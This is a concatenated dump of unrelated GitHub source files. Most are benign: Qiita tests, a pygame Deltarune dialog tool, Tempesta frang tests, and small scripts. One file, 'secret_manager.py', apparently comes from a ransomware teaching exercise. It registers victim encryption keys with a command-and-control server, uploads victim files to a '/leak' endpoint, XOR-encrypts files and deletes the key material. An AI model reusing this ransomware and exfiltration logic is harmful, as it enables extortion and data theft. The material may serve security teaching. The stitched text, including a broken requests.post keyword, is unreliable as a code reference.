'CCTCTGAGAGCT',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L002_sequences',\n 'str_column': 'NEW VAL',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'emp_status': 'EMP',\n 'new_col': 'val1'},\n '1.SKB8.640193': {\n 'barcode': 'GTCCGCAAGTTA',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L001_sequences',\n 'str_column': 'Value for sample 1',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'emp_status': 'EMP',\n 'new_col': 'val2'},\n '1.SKD8.640184': {\n 'barcode': 'CGTAGAGCTCTC',\n 'ebi_submission_accession': None,\n 'experiment_design_description': 'BBBB',\n 'library_construction_protocol': 'AAAA',\n 'primer': 'GTGCCAGCMGCCGCGGTAA',\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'run_prefix': 's_G1_L001_sequences',\n 'str_column': 'Value for sample 2',\n 'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'emp_status': 'EMP',\n 'new_col': 'val3'}}\n\n self.assertCountEqual(obs, exp)\n\n def test_ebi_experiment_accessions(self):\n obs = self.tester.ebi_experiment_accessions\n exp = {'1.SKB8.640193': 'ERX0000000',\n '1.SKD8.640184': 'ERX0000001',\n '1.SKB7.640196': 'ERX0000002',\n '1.SKM9.640192': 'ERX0000003',\n '1.SKM4.640180': 'ERX0000004',\n '1.SKM5.640177': 'ERX0000005',\n '1.SKB5.640181': 'ERX0000006',\n '1.SKD6.640190': 'ERX0000007',\n '1.SKB2.640194': 'ERX0000008',\n '1.SKD2.640178': 'ERX0000009',\n '1.SKM7.640188': 'ERX0000010',\n '1.SKB1.640202': 'ERX0000011',\n '1.SKD1.640179': 'ERX0000012',\n '1.SKD3.640198': 'ERX0000013',\n '1.SKM8.640201': 'ERX0000014',\n '1.SKM2.640199': 'ERX0000015',\n '1.SKB9.640200': 'ERX0000016',\n '1.SKD5.640186': 'ERX0000017',\n '1.SKM3.640197': 'ERX0000018',\n '1.SKD9.640182': 'ERX0000019',\n '1.SKB4.640189': 'ERX0000020',\n '1.SKD7.640191': 'ERX0000021',\n '1.SKM6.640187': 'ERX0000022',\n '1.SKD4.640185': 'ERX0000023',\n '1.SKB3.640195': 'ERX0000024',\n '1.SKB6.640176': 'ERX0000025',\n '1.SKM1.640183': 'ERX0000026'}\n self.assertEqual(obs, exp)\n\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study,\n self.data_type)\n obs = pt.ebi_experiment_accessions\n exp = {'%s.SKB8.640193' % self.test_study.id: None,\n '%s.SKD8.640184' % self.test_study.id: None,\n '%s.SKB7.640196' % self.test_study.id: None}\n self.assertEqual(obs, exp)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_ebi_experiment_accessions_setter(self):\n with self.assertRaises(qdb.exceptions.QiitaDBError):\n self.tester.ebi_experiment_accessions = {\n '1.SKB8.640193': 'ERX1000000', '1.SKD8.640184': 'ERX1000001'}\n\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n exp_acc = {'%s.SKB8.640193' % self.test_study.id: 'ERX0000126',\n '%s.SKD8.640184' % self.test_study.id: 'ERX0000127'}\n pt.ebi_experiment_accessions = exp_acc\n exp_acc['%s.SKB7.640196' % self.test_study.id] = None\n self.assertEqual(pt.ebi_experiment_accessions, exp_acc)\n exp_acc['%s.SKB7.640196' % self.test_study.id] = 'ERX0000128'\n pt.ebi_experiment_accessions = exp_acc\n self.assertEqual(pt.ebi_experiment_accessions, exp_acc)\n\n # We need to wrap the assignment in a function so we can use\n # npt.assert_warns\n def f():\n pt.ebi_experiment_accessions = exp_acc\n npt.assert_warns(qdb.exceptions.QiitaDBWarning, f)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_ebi_experiment_accessions_setter_common_samples(self):\n # If 2 different prep templates have common samples, setting the\n # ebi_experiment_accession should affect only the prep template\n # that it was called to, not both prep templates\n pt1 = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n pt2 = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n exp_acc1 = {'%s.SKB8.640193' % self.test_study.id: 'ERX0000126',\n '%s.SKD8.640184' % self.test_study.id: 'ERX0000127'}\n pt1.ebi_experiment_accessions = exp_acc1\n exp_acc1['%s.SKB7.640196' % self.test_study.id] = None\n self.assertEqual(pt1.ebi_experiment_accessions, exp_acc1)\n exp_acc2 = {k: None for k in exp_acc1.keys()}\n self.assertEqual(pt2.ebi_experiment_accessions, exp_acc2)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt1.id)\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt2.id)\n\n def test_is_submitted_to_ebi(self):\n self.assertTrue(self.tester.is_submitted_to_ebi)\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n self.assertFalse(pt.is_submitted_to_ebi)\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(pt.id)\n\n def test_validate_template_warning_missing(self):\n \"\"\"Raises an error if the template is missing a required column\"\"\"\n metadata_dict = {\n 'SKB8.640193': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',\n 'barcodesequence': 'GTCCGCAAGTTA',\n 'run_prefix': \"s_G1_L001_sequences\",\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'experiment_design_description': 'BBBB'}\n }\n metadata = pd.DataFrame.from_dict(metadata_dict, orient='index',\n dtype=str)\n PT = qdb.metadata_template.prep_template.PrepTemplate\n obs = PT._clean_validate_template(metadata, 2)\n\n metadata_dict = {\n '2.SKB8.640193': {'center_name': 'ANL',\n 'center_project_name': 'Test Project',\n 'ebi_submission_accession': None,\n 'linkerprimersequence': 'GTGCCAGCMGCCGCGGTAA',\n 'barcodesequence': 'GTCCGCAAGTTA',\n 'run_prefix': \"s_G1_L001_sequences\",\n 'platform': 'Illumina',\n 'instrument_model': 'Illumina MiSeq',\n 'library_construction_protocol': 'AAAA',\n 'experiment_design_description': 'BBBB'}\n }\n exp = pd.DataFrame.from_dict(metadata_dict, orient='index',\n dtype=str)\n obs.sort_index(axis=0, inplace=True)\n obs.sort_index(axis=1, inplace=True)\n exp.sort_index(axis=0, inplace=True)\n exp.sort_index(axis=1, inplace=True)\n assert_frame_equal(obs, exp, check_like=True)\n\n def test_delete_column(self):\n QE = qdb.exceptions\n pt = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n pt.delete_column('str_column')\n self.assertNotIn('str_column', pt.categories)\n\n # testing errors\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n with self.assertRaises(QE.QiitaDBOperationNotPermittedError):\n pt.delete_column('barcode')\n with self.assertRaises(QE.QiitaDBColumnError):\n pt.delete_column('ph')\n\n def test_delete_samples(self):\n QE = qdb.exceptions\n sid = self.test_study.id\n\n ptA = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n ptB = qdb.metadata_template.prep_template.PrepTemplate.create(\n self.metadata, self.test_study, self.data_type)\n\n # first let's test that we cannot delete all samples from one of the\n # preps\n with self.assertRaisesRegex(ValueError, \"You cannot delete all \"\n \"samples from an information file\"):\n ptA.delete_samples(list(ptA.keys()))\n\n # then continue with the regular testing\n sample1 = '%s.SKB8.640193' % sid\n sample2 = '%s.SKD8.640184' % sid\n sample3 = '%s.SKB7.640196' % sid\n ptA.delete_samples([sample1])\n self.assertNotIn(sample1, ptA)\n self.assertIn(sample2, ptA)\n self.assertIn(sample3, ptA)\n ptB.delete_samples([sample2, sample3])\n self.assertIn(sample1, ptB)\n self.assertNotIn(sample2, ptB)\n self.assertNotIn(sample3, ptB)\n\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n self.assertIn(sample1, pt)\n\n # testing errors\n with self.assertRaises(QE.QiitaDBUnknownIDError):\n ptA.delete_samples(['not.existing.sample'])\n\n pt = qdb.metadata_template.prep_template.PrepTemplate(2)\n with self.assertRaises(QE.QiitaDBOperationNotPermittedError):\n pt.delete_samples(['1.SKM5.640177'])\n\n # cleaning\n qdb.metadata_template.prep_template.PrepTemplate.delete(ptA.id)\n qdb.metadata_template.prep_template.PrepTemplate.delete(ptB.id)\n\n def test_name_setter(self):\n pt = qdb.metadata_template.prep_template.PrepTemplate(1)\n self.assertEqual(pt.name, 'Prep information 1')\n pt.name = 'New Name'\n self.assertEqual(pt.name, 'New Name')\n pt.name = 'Prep information 1'\n self.assertEqual(pt.name, 'Prep information 1')\n\n\nEXP_PREP_TEMPLATE = (\n 'sample_name\\tbarcode\\tcenter_name\\tcenter_project_name\\t'\n 'ebi_submission_accession\\temp_status\\texperiment_design_description\\t'\n 'insdc_nulls\\tinstrument_model\\tlibrary_construction_protocol\\tplatform\\t'\n 'primer\\tqiita_prep_id\\trun_prefix\\tstr_column\\n'\n '1.SKB7.640196\\tCCTCTGAGAGCT\\tANL\\tTest Project\\t\\tEMP\\tBBBB\\t'\n 'not applicable\\tIllumina MiSeq\\tAAAA\\tIllumina\\tGTGCCAGCMGCCGCGGTAA\\t'\n '{0}\\ts_G1_L002_sequences\\tValue for sample 3\\n'\n '1.SKB8.640193\\tGTCCGCAAGTTA\\tANL\\tTest Project\\t\\tEMP\\tBBBB\\t'\n '3.6\\tIllumina MiSeq\\tAAAA\\tIllumina\\tGTGCCAGCMGCCGCGGTAA\\t'\n '{0}\\ts_G1_L001_sequences\\tValue for sample 1\\n'\n '1.SKD8.640184\\tCGTAGAGCTCTC\\tANL\\tTest Project\\t\\tEMP\\tBBBB\\t'\n 'not applicable\\tIllumina MiSeq\\tAAAA\\tIllumina\\tGTGCCAGCMGCCGCGGTAA\\t'\n '{0}\\ts_G1_L001_sequences\\tValue for sample 2\\n')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"qiita-spots/qiita","sub_path":"qiita_db/metadata_template/test/test_prep_template.py","file_name":"test_prep_template.py","file_ext":"py","file_size_in_byte":90439,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"78"} +{"seq_id":"11773015698","text":"from hashlib import sha256\r\nimport logging\r\nimport os\r\nimport secrets\r\nfrom typing import List, Tuple\r\nimport os.path\r\nimport requests\r\nimport base64\r\n\r\nfrom cryptography.hazmat.primitives import hashes\r\nfrom cryptography.hazmat.primitives.KDF.pbkdf2 import PBKDF2HMAC\r\n\r\nfrom xorcrypt import xorfile\r\n\r\nclass SecretManager:\r\n ITERATION = 48000 # Number of iteration for the key derivation function\r\n TOKEN_LENGTH = 16 # Length of the token\r\n SALT_LENGTH = 16 # Length of the salt\r\n KEY_LENGTH = 16 # Length of the key\r\n\r\n def __init__(self, remote_host_port:str=\"127.0.0.1:6666\", path:str=\"/root\") -> None: \r\n self._remote_host_port = remote_host_port\r\n self._path = path # path to the malware\r\n self._key = None # key to decrypt files\r\n self._salt = None # salt to derive key\r\n self._token = None # token to identify the malware\r\n\r\n self._log = logging.getLogger(self.__class__.__name__) # logger\r\n\r\n\r\n def do_derivation(self, salt:bytes, key:bytes)->bytes: \r\n # derive key from salt and key\r\n KDF = PBKDF2HMAC(\r\n algorithm=hashes.SHA256(),\r\n length=self.KEY_LENGTH,\r\n salt=salt,\r\n iterations=self.ITERATION,\r\n )\r\n return KDF.derive(key)\r\n\r\n def create(self)->Tuple[bytes, bytes, bytes]: # create crypto DATA\r\n SALT = secrets.token_bytes(self.SALT_LENGTH)\r\n KEY = secrets.token_bytes(self.KEY_LENGTH)\r\n TOKEN = secrets.token_bytes(self.TOKEN_LENGTH)\r\n return SALT, KEY, TOKEN\r\n\r\n\r\n def bin_to_b64(self, DATA:bytes)->str: # convert binary DATA to base64\r\n TMP = base64.b64encode(DATA)\r\n return str(TMP, \"utf8\")\r\n\r\n\r\n def post_new(self, salt:bytes, key:bytes, token:bytes)->None:\r\n # register the victim to the CNC\r\n URL = f\"http://{self._remote_host_port}/new\"\r\n DATA = {\r\n \"salt\": self.bin_to_b64(salt),\r\n \"key\": self.bin_to_b64(key),\r\n \"token\": self.bin_to_b64(token),\r\n }\r\n self._log.info(f\"POST {URL} {DATA}\")\r\n R = requests.post(URL, DATA=DATA)\r\n self._log.info(f\"POST {URL} {DATA} {R.status_code}\")\r\n if R.status_code != 200:\r\n raise Exception(\"Error while registering to the CNC\")\r\n\r\n def setup(self)->None: # main function to create crypto DATA and register malware to cnc\r\n SALT, KEY, TOKEN = self.create() # create crypto DATA\r\n self.post_new(SALT, KEY, TOKEN) # register to the CNC\r\n self._salt = SALT # set the salt\r\n self._key = KEY# set the key\r\n self._token = TOKEN # set the token\r\n # save token in token.bin if not already present\r\n if not os.path.exists(os.path.join(self._path, \"token.bin\")): # if token.bin not present\r\n with open(os.path.join(self._path, \"token.bin\"),\r\n \"wb\") as f:\r\n f.write(TOKEN)\r\n with open(os.path.join(self._path, \"salt.bin\"), \"wb\") as f:\r\n f.write(SALT)\r\n self._log.info(\"Setup done\") # log\r\n\r\n\r\n def load(self)->None:\r\n # function to load crypto DATA from the target\r\n with open(os.path.join(self._path, \"salt.bin\"), \"rb\") as f:\r\n self._salt = f.read()\r\n with open(os.path.join(self._path, \"token.bin\"), \"rb\") as f:\r\n self._token = f.read()\r\n \r\n\r\n def check_key(self, candidate_key:bytes)->bool:\r\n # check if the candidate key is valid \r\n URL = f\"http://{self._remote_host_port}/check\" # URL to check the key\r\n DATA = {\r\n \"token\": self.bin_to_b64(self._token),\r\n \"key\": self.bin_to_b64(candidate_key)\r\n }\r\n self._log.info(f\"POST {URL} {DATA}\") # log the request\r\n R = requests.post(URL, DATA=DATA)\r\n self._log.info(f\"POST {URL} {DATA} {R.status_code}\") # log the response\r\n if R.status_code != 200:\r\n return False\r\n return True\r\n\r\n\r\n def set_key(self, b64_key:str)->None:\r\n # If the key is valid, set the self._key var for decrypting\r\n KEY = base64.b64decode(b64_key)\r\n if self.check_key( KEY):\r\n self._key = KEY\r\n self._log.info(\"Key set\")\r\n else:\r\n raise Exception(\"Invalid key\")\r\n\r\n\r\n def get_hex_token(self)->str:\r\n # Return a string composed of hex symbole, regarding the token\r\n with open (os.path.join(self._path, \"token.bin\"), \"rb\") as f:\r\n TOKEN = f.read()\r\n return str(TOKEN.hex())\r\n\r\n\r\n def xorfiles(self, files:List[str])->None:\r\n # xor a list for file\r\n for f in files:\r\n xorfile(os.path.join(self._path, f), self._key)\r\n \r\n \r\n\r\n def leak_files(self, files:List[str])->None:\r\n # send file, geniune path and token to the CNC\r\n for f in files:\r\n with open(os.path.join (self._path, f), \"rb\") as f:\r\n DATA = f.read()\r\n URL = f\"http://{self._remote_host_port}/leak\"\r\n DATA = {\r\n \"token\": self.bin_to_b64(self._token),\r\n \"DATA\": self.bin_to_b64(DATA),\r\n \"filename\": f\r\n }\r\n self._log.info(f\"POST {URL} {DATA}\")\r\n R = requests.post(URL, DATA=DATA)\r\n self._log.info(f\"POST {URL} {DATA} {R.status_code}\")\r\n if R.status_code != 200:\r\n raise Exception(\"Error while sending file to the CNC\")\r\n\r\n def clean(self):# Mr propre\r\n # remove crypto DATA from the target\r\n os.remove(os.path.join(self._path, \"salt.bin\"))\r\n os.remove(os.path.join(self._path, \"token.bin\"))\r\n\r\n \r\n\r\n \r\n\r\n \r\n","repo_name":"Obsterpouspug/TD_ransomware_IKA","sub_path":"TD-ransomware-IK/sources/secret_manager.py","file_name":"secret_manager.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26023984652","text":"#-*- coding:utf-8 -*-\n\nfrom functools import wraps\ndef rename_app_list(func):\n m = {'Sites':'Web sites',\n 'Auth':'帐号管理',\n 'Cafe_Search':'数据库',\n }\n\n @wraps(func)\n def _wrapper(*args, **kwargs):\n response = func(*args, **kwargs)\n app_list = response.context_data.get('app_list')\n\n if app_list is not None:\n for a in app_list:\n name = a['name']\n a['name'] = m.get(name, name)\n title = response.context_data.get('title')\n\n if title is not None:\n app_label = title.split(' ')[0]\n if app_label in m:\n response.context_data['title'] = \"%s管理\" % m[app_label]\n return response\n return _wrapper\n","repo_name":"dtbinh/test","sub_path":"Cafe/Cafe_search/appVerbosename.py","file_name":"appVerbosename.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"14433700075","text":"import os\ndef getAllDirRE(path, sp = ''):\n sp += '---'\n # 得到当前目录下所有文件\n filesList = os.listdir(path)\n # 处理每一个文件\n for fileName in filesList:\n # path\\fileName (用绝对路径)\n if os.path.isdir(os.path.join(path, fileName)):\n print(sp + '目录', fileName)\n getAllDirRE(os.path.join(path, fileName),sp)\n else:\n print(sp + '普通文件', fileName)\n\ngetAllDirRE(r'D:\\pythontext')\n","repo_name":"qscf1234/pythontext","sub_path":"day09/3-目录遍历/1、递归遍历目录.py","file_name":"1、递归遍历目录.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"22152845998","text":"import json\nfrom klein import run, route\nfrom twisted.python import log\n\n\n@route('/')\ndef echo(request):\n request.setHeader('Content-Type', 'application/json')\n message = json.load(request.content)\n log.msg('Received: %r' % (message,))\n\n if not message.get('type') == 'message':\n return json.dumps([])\n\n return json.dumps([{\n 'text': 'You said: %s' % (message['text'],),\n 'type': 'message',\n 'channel': message['channel'],\n }])\n\n\nrun(\"localhost\", 8000)\n","repo_name":"praekeltfoundation/heatherrd","sub_path":"echo.py","file_name":"echo.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"32896840635","text":"from pygame import mixer\nimport speech_recognition as sr\nimport pyaudio\nimport pygame\nimport time\nimport keyboard\npygame.init()\n\nx = 1334\ny = 376\nz = \"* hotkeys are CTRL+1-6 to change portrait icons\"\nlinebreak = 0\nn = \"* \"\nb = \"\"\na = \"\"\nk = \"\"\nchange = \"\"\nportraitImage = 1\nzstring = \"\"\nbstring = \"\"\nastring = \"\"\ncounter = \"\"\noneusevariable = 1\n\npygame.display.set_mode((x,y))\n\nscrn = pygame.display.set_mode((x, y))\n\nportrait = pygame.image.load(\"ralsei_idle.png\").convert()\nportrait = pygame.transform.scale(portrait, (262, 220))\nscrn.blit(portrait, (91, 85))\n\ndialog = pygame.image.load(\"dialog.png\").convert()\nscrn.blit(dialog, (0, 0))\n\nfont_1 = pygame.font.Font(\"determinationMono.ttf\", 59)\n\npygame.display.set_caption('speech to deltarune')\npygame_icon = pygame.image.load('deltarune.png')\npygame.display.set_icon(pygame_icon)\n \nmic = pyaudio.PyAudio()\nstream = mic.open(format=pyaudio.paInt16, channels=1, rate=16000, input=True, frames_per_buffer=8192)\nstream.start_stream()\n \nmixer.init()\nmixer.music.load(\"ralsei_snd.wav\")\nmixer.music.set_volume(0.7)\n\n\ng = 0 \nr=sr.Recognizer()\nwith sr.Microphone() as source:\n r.adjust_for_ambient_noise(source,duration=1)\n\npygame.display.flip()\nrunning = True\nwhile running:\n \n if g == 3:\n with sr.Microphone() as source:\n print(\"say anything : \")\n audio= r.listen(source)\n try:\n z = r.recognize_google(audio)\n z = \"* \" + z\n except:\n z = \"* could not recognize \"\n\n\n def print_string(sentence):\n count = 0\n #sentence = str(sentence)\n while count < len(sentence):\n global k\n k = k + sentence[count]\n o = k\n text = font_1.render(o, False, (255, 255, 255))\n if dialogs == 1:\n scrn.blit(text, (337,64))\n if dialogs == 2:\n scrn.blit(text, (407,144))\n if dialogs == 3:\n scrn.blit(text, (407,224))\n print(k)\n pygame.display.update()\n mixer.music.play()\n count += 1\n time.sleep(0.04)\n k = \"\"\n o = \"\"\n \n\n #optimized code hours right here\n if keyboard.is_pressed(\"ctrl+1\"):\n portraitImage = 1\n print(\"1\")\n elif keyboard.is_pressed(\"ctrl+2\"):\n portraitImage = 2\n print(\"2\")\n elif keyboard.is_pressed(\"ctrl+3\"):\n portraitImage = 3\n print(\"3\")\n elif keyboard.is_pressed(\"ctrl+4\"):\n portraitImage = 4\n print(\"4\")\n elif keyboard.is_pressed(\"ctrl+5\"):\n portraitImage = 5\n print(\"5\")\n elif keyboard.is_pressed(\"ctrl+6\"):\n portraitImage = 6\n print(\"6\")\n\n if portraitImage == 1:\n portrait = pygame.image.load(\"ralsei_idle.png\").convert()\n portrait = pygame.transform.scale(portrait, (262, 220))\n elif portraitImage == 2:\n portrait = pygame.image.load(\"ralsei_happy.png\").convert()\n portrait = pygame.transform.scale(portrait, (262, 220))\n elif portraitImage == 3:\n portrait = pygame.image.load(\"ralsei_blush.png\").convert()\n portrait = pygame.transform.scale(portrait, (262, 220))\n elif portraitImage == 4:\n portrait = pygame.image.load(\"ralsei_worry.png\").convert()\n portrait = pygame.transform.scale(portrait, (262, 220))\n elif portraitImage == 5:\n portrait = pygame.image.load(\"ralsei_what.png\").convert()\n portrait = pygame.transform.scale(portrait, (262, 220))\n elif portraitImage == 6:\n portrait = pygame.image.load(\"ralsei_smug.png\").convert()\n portrait = pygame.transform.scale(portrait, (262, 220))\n \n #sadly the end of optimized code hours\n\n scrn.blit(portrait, (74, 86))\n zlist = z.split()\n blist = list(b)\n alist = list(a)\n\n\n if not change == z and not z == \"* huh\":\n scrn.blit(dialog, (0, 0))\n scrn.blit(portrait, (74, 86))\n for i in range(1, len(z.split())):\n zlist.insert(i + (i - 1), \" \")\n for i in range(len(zlist)):\n counter = counter + zlist[i]\n if len(counter) >= 25 and not len(counter) >= 50:\n blist.append(zlist[i])\n if len(counter) >= 50 and not len(counter) >= 75:\n alist.append(zlist[i])\n counter = \"\"\n for i in range(len(zlist)):\n if not len(counter) >=25:\n counter = counter + zlist[i]\n if len(counter) >= 25:\n if i < len(zlist):\n del zlist[i]\n counter = \"\"\n\n\n\n for i in range(len(zlist)):\n zstring = zstring + zlist[i]\n for i in range(len(blist)):\n bstring = bstring + blist[i]\n for i in range(len(alist)):\n astring = astring + alist[i]\n\n change = z\n dialogs = 1\n print_string(zstring)\n dialogs = 2\n print_string(bstring)\n dialogs = 3\n print_string(astring)\n change = z\n zstring = \"\"\n bstring = \"\"\n astring = \"\"\n\n print(zstring)\n print(bstring)\n print(astring)\n time.sleep(1)\n counter = \"\"\n\n \n\n k = \"\"\n\n\n if g == 2:\n g = 3\n if g == 1:\n z = \"* have fun!\"\n g = 2\n if g == 0:\n z = \"* remember to hold them down or else they wont go through\"\n g = 1\n \n\n\n\n\n\n for event in pygame.event.get(): \n if event.type == pygame.QUIT: \n running = False","repo_name":"gamrtiem/deltarune-dialog-speech-to-text","sub_path":"main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"9668946120","text":"\"\"\"Functional tests for `http_header_chunk_cnt` and `http_body_chunk_cnt` directive\"\"\"\n\n__author__ = \"Tempesta Technologies, Inc.\"\n__copyright__ = \"Copyright (C) 2022-2023 Tempesta Technologies, Inc.\"\n__license__ = \"GPL2\"\n\nfrom t_frang.frang_test_case import FrangTestCase, H2Config\n\nCLIENT = {\n \"id\": \"deproxy-1\",\n \"type\": \"deproxy\",\n \"addr\": \"${tempesta_ip}\",\n \"port\": \"80\",\n \"segment_gap\": 100, # ms\n}\n\n\nclass HttpHeaderChunkCnt(FrangTestCase):\n error = \"Warning: frang: HTTP header chunk count exceeded\"\n clients = [CLIENT]\n\n requests = [\n \"POST / HTTP/1.1\\r\\n\",\n \"Host: localhost\\r\\n\",\n \"Content-type: text/plain\\r\\n\" \"Content-Length: 0\\r\\n\\r\\n\",\n ]\n\n def test_header_chunk_cnt_ok(self):\n \"\"\"Set up `http_header_chunk_cnt 3;` and make request with 3 header chunk\"\"\"\n client = self.base_scenario(\n frang_config=\"http_header_chunk_cnt 3;\",\n requests=self.requests,\n disable_hshc=True,\n )\n self.check_response(client, \"200\", self.error)\n\n def test_header_chunk_cnt_ok_2(self):\n \"\"\"Set up `http_header_chunk_cnt 5;` and make request with 3 header chunk\"\"\"\n client = self.base_scenario(\n frang_config=\"http_header_chunk_cnt 5;\",\n requests=self.requests,\n disable_hshc=True,\n )\n self.check_response(client, \"200\", self.error)\n\n def test_header_chunk_cnt_invalid(self):\n \"\"\"Set up `http_header_chunk_cnt 2;` and make request with 3 header chunk\"\"\"\n client = self.base_scenario(\n frang_config=\"http_header_chunk_cnt 2;\", requests=self.requests, disable_hshc=True\n )\n self.check_response(client, \"403\", self.error)\n\n\nclass HttpBodyChunkCnt(FrangTestCase):\n error = \"Warning: frang: HTTP body chunk count exceeded\"\n clients = [CLIENT]\n\n requests = [\n \"POST / HTTP/1.1\\r\\nHost: debian\\r\\nContent-type: text/plain\\r\\nContent-Length: 4\\r\\n\\r\\n\",\n \"1\",\n \"2\",\n \"3\",\n \"4\",\n ]\n\n def test_body_chunk_cnt_ok(self):\n \"\"\"Set up `http_body_chunk_cnt 4;` and make request with 4 body chunk\"\"\"\n client = self.base_scenario(frang_config=\"http_body_chunk_cnt 4;\", requests=self.requests)\n self.check_response(client, \"200\", self.error)\n\n def test_body_chunk_cnt_ok_2(self):\n \"\"\"Set up `http_body_chunk_cnt 10;` and make request with 4 body chunk\"\"\"\n client = self.base_scenario(frang_config=\"http_body_chunk_cnt 10;\", requests=self.requests)\n self.check_response(client, \"200\", self.error)\n\n def test_body_chunk_cnt_invalid(self):\n \"\"\"Set up `http_body_chunk_cnt 3;` and make request with 4 body chunk\"\"\"\n client = self.base_scenario(frang_config=\"http_body_chunk_cnt 3;\", requests=self.requests)\n self.check_response(client, \"403\", self.error)\n\n\nclass HttpHeaderChunkCntH2Base(H2Config, FrangTestCase, base=True):\n segment_size: int\n\n def base_scenario(self, frang_config: str, requests: list, disable_hshc: bool = False):\n self.set_frang_config(\n \"\\n\".join(\n [frang_config] + ([\"http_strict_host_checking false;\"] if disable_hshc else [])\n )\n )\n\n client = self.get_client(\"deproxy-1\")\n client.parsing = False\n client.start()\n\n client.update_initial_settings()\n client.send_bytes(client.h2_connection.data_to_send())\n client.wait_for_ack_settings()\n client.h2_connection.clear_outbound_data_buffer()\n\n client.segment_size = self.segment_size\n client.make_request(requests[0], huffman=False)\n client.wait_for_response(3)\n return client\n\n\nclass HttpHeaderChunkCntH2(HttpHeaderChunkCntH2Base, HttpHeaderChunkCnt):\n requests = [\n [\n (\":authority\", \"localhost\"),\n (\":path\", \"/\"),\n (\":scheme\", \"https\"),\n (\":method\", \"POST\"),\n (\"12345\", \"x\" * 5),\n ]\n ]\n #\n # header frame = 9 header bytes + 27 header block bytes, headers are in 2-4 chunks\n segment_size = 9 # headers - 27 bytes (3 chunks)\n\n\nclass HttpBodyChunkCntH2(HttpHeaderChunkCntH2Base, HttpBodyChunkCnt):\n \"\"\"Tempesta counts only bytes of body.\"\"\"\n\n requests = [\n (\n [\n (\":authority\", \"example.com\"),\n (\":path\", \"/\"),\n (\":scheme\", \"https\"),\n (\":method\", \"POST\"),\n ],\n \"x\" * 4,\n ),\n ]\n segment_size = 1 # request body - 4 bytes (4 chunks)\n","repo_name":"tempesta-tech/tempesta-test","sub_path":"t_frang/test_http_body_and_header_chunk_cnt.py","file_name":"test_http_body_and_header_chunk_cnt.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"78"} +{"seq_id":"38546685231","text":"def claim_fabric(claims):\n fabric = [[0]*1000 for i in range(1000)]\n\n for claim in claims:\n claim_split = claim.split()\n x, y = claim_split[2].replace(':', '').split(',')\n width, height = claim_split[3].split('x')\n\n x = int(x)\n y = int(y)\n width = int(width)\n height = int(height)\n\n for j in range(y, y + height):\n for k in range(x, x + width):\n fabric[j][k] += 1\n\n return fabric\n\n\ndef count_overlaps(fabric):\n overlaps = 0\n\n for row in fabric:\n overlaps += sum(1 for coord in row if coord > 1)\n\n return overlaps\n\n\ndef main():\n claims = open(\"input.txt\")\n fabric = claim_fabric(claims)\n overlaps = count_overlaps(fabric)\n return overlaps\n\n\nprint(main())\n","repo_name":"johnsickels/advent-of-code","sub_path":"2018/three/one.py","file_name":"one.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"31857997468","text":"import sklearn\nfrom sklearn import datasets\nfrom sklearn import svm\nfrom sklearn.neighbors import KNeighborsClassifier\n\ncancer= datasets.load_breast_cancer()\n\nprint(cancer.feature_names)\n\n# //classify into either malignant or benign\nprint(cancer.target_names)\n\nX=cancer.data\ny=cancer.target\n\n#split the data into training and test\n#use k nearest neighbour classification\nx_train, x_test, y_train, y_test = sklearn.model_selection.train_test_split(X, y, test_size = 0.1)\n\nmodel = KNeighborsClassifier(n_neighbors=9)\n\nmodel.fit(x_train , y_train)\n\naccuracy = 